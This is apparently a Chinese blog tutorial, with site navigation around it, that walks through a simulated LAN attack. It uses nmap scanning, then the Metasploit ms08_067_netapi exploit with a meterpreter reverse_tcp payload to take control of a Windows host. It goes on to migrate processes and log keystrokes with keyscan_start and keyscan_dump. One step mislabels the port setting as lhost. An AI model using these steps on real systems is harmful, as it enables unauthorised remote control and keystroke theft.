zoukankan      html  css  js  c++  java
  • 缓冲区溢出漏洞利用,Kali linux内网渗透远程控制Windows主机

    内网渗透即攻击机和被攻击机处于同一网段,攻击机对被攻击机发起渗透。

    本次渗透环境是模拟环境,并非真实网络环境。

    1. 实验环境介绍:攻击机和被攻击机同属于192.168.20.0/24网段,其中攻击机是Linux(kali)主机,ip为192.168.20.1/24,被攻击机是Windows主机(当然攻击者事前并不知道攻击目标的主机系统类型),ip为192.168.20.2/24。软件工具:网络扫描器nmap,漏洞利用工具metasploit framework(简称msf),kali已经集成了这两个工具,可以直接使用。
    2. 攻击过程
    • 信息收集

      攻击目标的首要前提是知道对方的IP地址,才能与目标建立通信。这里介绍一款常用的网络扫描工具nmap,Kali中已经集成了该工具。进入Kali桌面,在左上角的             “应用程序”中信息收集一栏找到“nmap”,打开,弹出终端界面,此时nmap工具已经打开,可以使用了。

      • 扫描IP:先扫描所有和攻击机同网段的主机IP,命令格式:nmap -sn 192.168.20.0/24

         可以看到,我们已经知晓了攻击目标的IP地址为192.168.20.2(红框部分)

      • 扫描操作系统:知道了IP地址我们就能够与目标主机建立通信,但在建立通信控制目标主机之前,我们还要知道目标主机的操作系统类型,不同类型系统攻击方式不一样。同样使用nmap工具,命令格式:namp -O 192.168.20.2。这条命令的意思是,扫描IP为192.168.20.2的主机系统类型,参数-O为大写字母O。

         扫描结果显示,被扫描的主机192.168.20.2正在运行的系统是Windows XP 2003(红框部分),是Windows系统。

    • 获取shell
      • 打开漏洞利用工具Metasploit Framewor(msf)(kali左上角应用程序中,漏洞利用工具一栏)。Metasploit Framework 作为一个缓冲区测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。如下图所示,msf中已经收集了1577个可利用的缓冲区溢出漏洞,和455个可用的攻击载荷(红框部分)。这次我们要利用的漏洞是ms08-067,首先在1577个漏洞中搜索ms08-067,命令:search ms08-067。可以看到,msf中已经收集了该漏洞(黄框部分)。
      •  利用该漏洞可以使目标主机与攻击机建立会话。命令:use exploit/windows/smb/ms08_067_netapi(即黄框部分)

      • 设置攻击参数,命令:
        • 设置本地地址(攻击机):set lhost 192.168.20.1
        • 设置远程地址(被攻击机):set rhost 192.168.20.2
        • 设置本地端口:set lhost 8888
        • 挂载攻击载荷windows/meterpreter/reverse_tcp,该载荷会给目标主机发送大量恶意代码:set payload windows/meterpreter/reverse_tcp
      • 开始攻击:命令:exploit

         如图出现meterpreter>,表示已经和目标主机建立连接,可以远程控制目标了。

      • 获得shell,即进入目标主机cmd控制台,如图所示,显示IP为目标主机ip,表明目标主机已被控制。
      • 如果出现下面情况,表示与目标主机的连接已经中断,可以再次使用命令exploit发起新的攻击。
    • 提升权限:

      获取shell后,当前用户权限太低,不能够获取有效信息,甚至查看文件文件名都是乱码,所以需要提权。提权方式:将当前进程切换到权限更高的cmd.exe程序所在的进程。

      查看进程号,命令:ps,找到cmd.exe,看到进程号为1272(进程号并不统一,按自己的来)

             

      将进程号切换到1272,命令:migrate 1272 

      此时我们就可以做一些需要高权限的事了,比如监控目标主机的键盘,可以得到目标主机键盘输入的内容

      命令:

      开启键盘监控:keyscan_start

      返回键盘输入内容:keyscan_dump

      

       目标主机键盘输入如上内容。

      

       攻击机得到第二行红框中的内容。

    <未完待续>

      

  • 相关阅读:
    ##日常代码中,我们需要配的几种数据源的配置文件
    ##Sping框架IOC中常用的注解大家一定要记住
    ##事务管理器工具类
    ##管理连接的工具类 用来实现连接 和线程的绑定
    ##处理转账事务的多线程问题,让其在一个线程处理账务的增加和减少
    学习笔记——spark安装配置
    学习笔记——spark基础实验二
    学习笔记——spark实验一
    课堂测试之数据清洗
    Mapreduce实例——WordCount
  • 原文地址:https://www.cnblogs.com/Wonfoomee/p/Wonfoomee_blog1.html
Copyright © 2011-2022 走看看